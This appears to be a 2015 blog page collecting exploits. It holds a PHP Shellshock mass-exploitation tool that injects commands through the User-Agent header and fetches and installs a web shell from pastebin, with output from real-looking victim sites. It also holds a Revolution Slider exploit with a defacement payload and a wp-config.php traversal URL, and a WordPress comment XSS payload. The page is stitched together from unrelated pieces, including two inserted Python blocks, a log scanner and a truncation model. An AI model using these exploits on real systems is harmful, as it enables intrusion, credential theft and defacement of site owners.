Tuesday, 12 May 2015

<?php/* # SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Email: inurlbr@gmail.com # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil -------------------------------------------------------------------------------------- # DESCRIPTION - VULNERABILITY(SHELLSHOCK) - CVE-2014-6271, CVE-2014-6277, - CVE-2014-6278, CVE-2014-7169, - CVE-2014-7186, CVE-2014-7187 Is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. -------------------------------------------------------------------------------------- # DESCRIPTION - TOOL The tool inject a malicious user agent that allows exploring the vulnerabildiade sheelshock running server-side commands. -------------------------------------------------------------------------------------- # EXECUTION -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. 
Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w OUTPUT VULN: SHELLSHOCK_vull.txt -------------------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR ./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd" -------------------------------------------------------------------------------------- # Exemples: php xpl.php -t 'http://www.camnpalxxx.com.br/cgi-bin/login.sh' -c pwd CMD: Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504 @ 2.00GHz GenuineIntel GNU/Linux uid=1000(icone) gid=100(users) groups=100(users) /ico/camnpal/cgi-bin END_CMD: php xpl.php -t 'http://www.bnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd CMD: Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster) /mnt/volume1/sitio/data/catalogos/cgi-bin END_CMD: -------------------------------------------------------------------------------------- */error_reporting(1);set_time_limit(0);ini_set('display_errors', 1);ini_set('max_execution_time', 0);ini_set('allow_url_fopen', 1);ob_implicit_flush(true);ob_end_flush();$op_ = getopt('f:c:t:w::', array('help::'));echo "\n\t[-] [Exploit]: Xpl SHELLSHOCK Ch3ck / INURL - BRASIL\n\t[?] [help]: --help\n\n";$menu = " -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w\n";echo isset($op_['help']) ? $menu : NULL;$cmd = not_isnull_empty($op_['c']) ? 
"uname -a && id && {$op_['c']}" : exit("\n\t[x] [ERRO] DEFINE COMMAND!\n");$wget = "wget http://pastebin.com/raw.php?i=UD9UwaNd -O inurl.php; chmod 777 inurl.php";$params['host'] = not_isnull_empty($op_['t']) ? $op_['t'] : NULL;$params['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$cmd}; echo END_CMD:;\"";$params['payload'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$wget}; echo END_CMD:;\"";$params['file'] = not_isnull_empty($op_['f']) ? $op_['f'] : NULL;$params['line'] = "--------------------------------------------------------------";not_isnull_empty($params['host']) && not_isnull_empty($params['file']) ? exit("\n\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;echo "\t[+] [COMMAND]: {$cmd}\n";function __plus() { ob_flush(); flush();}function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;}function __request($params, $op = 0) { $objcurl = curl_init($params['host']); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($objcurl, CURLOPT_TIMEOUT, 5); curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1); curl_setopt($objcurl, CURLOPT_USERAGENT, $params['user_agent_xpl']); $info['corpo'] = curl_exec($objcurl) . __plus(); $erro = curl_error($objcurl); not_isnull_empty($erro) ? print("\t[x] [ERROR]: {$erro}\n") : NULL; $_[0] = explode("\n", $info['corpo']); $_[1] = curl_getinfo($objcurl); if ($op != 0) { return $_; } if ($_[0][0] == '99887766555') { foreach ($_[0] as $valores) { $__.= $valores . "\n"; if ($valores == 'END_CMD:') break; } $__ = str_replace('99887766555', '', $__); file_put_contents('SHELLSHOCK_vull.txt', "{$params['host']}{$__}{$params['line']}\n", FILE_APPEND); echo "\t[!] VULN SHELLSHOCK\n\t[!] 
OUTPUT SERVER:: {$__}"; return TRUE; } else { echo "\t[x] [NOT VULN]\n"; } curl_close($objcurl) . __plus(); return FALSE;}function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n"; foreach ($tgt_ as $url) { echo "\n\t[+] [INFO] SCANNING : {$url} \n"; __plus(); $file['host'] = $url; __request($file) . __plus(); }}if (__request($params)) { $params['user_agent_xpl'] = $params['payload']; $h_ = parse_url($params['host']); $h__ = "http://{$h_['host']}{$h_['path']}/inurl.php?0=uname%20-a%20%26%26%20ls%20-la"; if (isset($op_['w'])) { echo "\t[!] UPLOAD SHELL_SCRIPT!\n"; $__ = __request($params, 1); if ($__[0][0] == '99887766555') { echo "\t[!] PAYLOAD: {$wget}\n"; echo "\t[!] INCTION PAYLOAD SUCCESS\n"; $params['host'] = $h__; $cmd = __request($params, 1); if ($cmd['http_code'] == 200) { echo "\t[!] SUCCESSFULLY UPLOADED FILE {$h__}\n"; echo "\t[!] opening auxiliary window...\n"; system("sudo xterm -geometry 134x50 -e curl -v '$h__' > /dev/null &", $dados); } else { echo "\t[X] FAILURE TO FILE CREATION\n"; } } } echo "\t" . $params['line'] . "\n";}

######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: inurl://"co.il/wp-admin/admin-ajax.php?action=revslider_ajax_action"
inurl://".co.il/wp-admin/admin-ajax.php?action="
inurl:admin-ajax.php?action=revslider_show_image
-intext:"revslider_show_image" & your own
# Exploit Author: Code Breaker(Team Cyber Switch)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Get Config/database mysql :  victim.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# Vulnerable File : revslider_admin.php

# Exploit :

<?php

$post = array
(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
"data" => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center>Hacked By Code Breaker<p style='color: transparent'>"
);

$ch = curl_init ("http://localhost/wp-admin/admin-ajax.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

?>

# Path of Result : /wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
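As an added defensive example (not code from either advisory or from their authors), the following scans constructed Apache combined-format access-log lines for the two request shapes this page describes: a User-Agent carrying the Shellshock function-definition prefix `() {` that the first listing injects, and the Revolution Slider `revslider_show_image&img=../` traversal and `revslider_ajax_action` POST requests from the second. The log lines, client IPs and rule names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in Apache combined log format; not captured traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/May/2015:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 200 3112 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2015:10:01:03 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=..%252F..%252Fwp-config.php HTTP/1.1" 200 3112 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2015:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=slider1/banner.jpg HTTP/1.1" 200 40211 "-" "Mozilla/5.0"
203.0.113.5 - - [12/May/2015:10:02:30 +0000] "POST /wp-admin/admin-ajax.php?action=revslider_ajax_action HTTP/1.1" 200 52 "-" "Mozilla/5.0"
192.0.2.9 - - [12/May/2015:10:03:11 +0000] "GET /cgi-bin/login.sh HTTP/1.1" 200 311 "-" "() { :; }; echo CMD:"
"""

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>.*)"$'
)
# Shellshock: the exported-function prefix is the constant part of every variant
_SHELLSHOCK_UA = re.compile(r"\(\)\s*\{")


def classify(line: str):
    """Return (rule, client_ip, detail) for a suspicious line, else None."""
    m = _LINE.match(line)
    if not m:
        return None
    if _SHELLSHOCK_UA.search(m["ua"]):
        return ("shellshock_user_agent", m["ip"], m["ua"])
    parts = urlsplit(m["target"])
    if not parts.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    q = parse_qs(parts.query)
    action = q.get("action", [""])[0]
    if action == "revslider_show_image":
        # parse_qs already decoded once; decode again to catch double-encoding
        img = unquote(q.get("img", [""])[0])
        if ".." in img.replace("\\", "/").split("/"):
            return ("revslider_traversal", m["ip"], img)
    if action == "revslider_ajax_action" and m["method"] == "POST":
        return ("revslider_ajax_post", m["ip"], parts.query)
    return None


def scan(log: str):
    """All hits over a multi-line log, in file order."""
    return [hit for hit in (classify(l) for l in log.splitlines()) if hit]
```

The POST rule only says that the unauthenticated AJAX action was reached; the `client_action` value travels in the request body and is not visible in an access log, so it needs a WAF or application log to confirm.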


Demo:

Yes, you’ve read it right: a critical, unpatched 0-day vulnerability affecting WordPress’ comment mechanisms was disclosed earlier today by Klikki Oy.
Who’s affected
If your WordPress site allows users to post comments via the WordPress commenting system, you're at risk. An attacker could leverage a bug in the way comments are stored in the site's database to insert malicious scripts into your site, potentially allowing them to infect your visitors with malware, inject SEO spam, or even insert a backdoor into the site's code if the script runs in a logged-in administrator's browser.
You should definitely disable comments on your site until a patch is made available or leverage a WAF to protect your site and customers.
Technical details
This vulnerability requires an attacker to send a comment long enough to force the backend MySQL database to truncate what is stored.
WordPress Database Schema
As you can see from the above schema, comment texts are stored in the comment_content column, which is a TEXT column, meaning a comment can contain at most 65535 bytes of data.
A typical exploit would look like the following:
<a href='x onclick=alert(1) AAAAAAAAAAAAAA..(multiplied so our comment contains more than 65k bytes)'>test</a>
Once taken back from the database would look like this:
<p><a href='x onclick=alert(1) AAAAAAA</p>
Some of you might have noticed that the resulting HTML tag isn't complete, but this isn't a problem for most modern browsers, as most of them will simply patch it up automatically.
This bug then allows anyone to insert arbitrary HTML tag attributes into the hyperlink, including JavaScript event handlers.
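To make the storage-truncation point concrete, here is an added example (not code from the original post or from WordPress) that models a MySQL TEXT column with strict mode off and a constructed stand-in for an input-side sanitizer, then shows why the length must be enforced before storage: the text that was validated is not the text that ends up in the database. The filter regex, the helper names and the padding length are assumptions made for the example.

```python
import re
from typing import Optional

TEXT_COLUMN_MAX_BYTES = 65535  # capacity of a MySQL TEXT column, as in the post

# Constructed stand-in for an input-side sanitizer (not WordPress's KSES):
# accept a link only if its single attribute value is quoted and the tag is closed.
_SAFE_LINK = re.compile(r"^<a href='[^'<>]*'>[^<>]*</a>$")


def passes_input_filter(comment: str) -> bool:
    """Validation as run on the full comment, before it reaches the database."""
    return bool(_SAFE_LINK.match(comment))


def store_in_text_column(value: str) -> str:
    """Model of a TEXT column without MySQL strict mode: excess bytes are dropped silently."""
    return value.encode("utf-8")[:TEXT_COLUMN_MAX_BYTES].decode("utf-8", errors="ignore")


def build_comment(padding: int) -> str:
    """Constructed sample shaped like the one in the post: the quoted href value is
    padded with 'A's so the closing quote and </a> fall past the column limit."""
    return "<a href='x onclick=alert(1) " + "A" * padding + "'>test</a>"


def naive_store(comment: str) -> Optional[str]:
    """Vulnerable flow: validate, then store; nothing re-checks what was stored."""
    if not passes_input_filter(comment):
        return None
    return store_in_text_column(comment)


def checked_store(comment: str) -> Optional[str]:
    """Hardened flow: refuse anything the column cannot hold, so the text that
    was validated is byte-for-byte the text that is stored and later rendered."""
    if len(comment.encode("utf-8")) > TEXT_COLUMN_MAX_BYTES:
        return None
    return naive_store(comment)
```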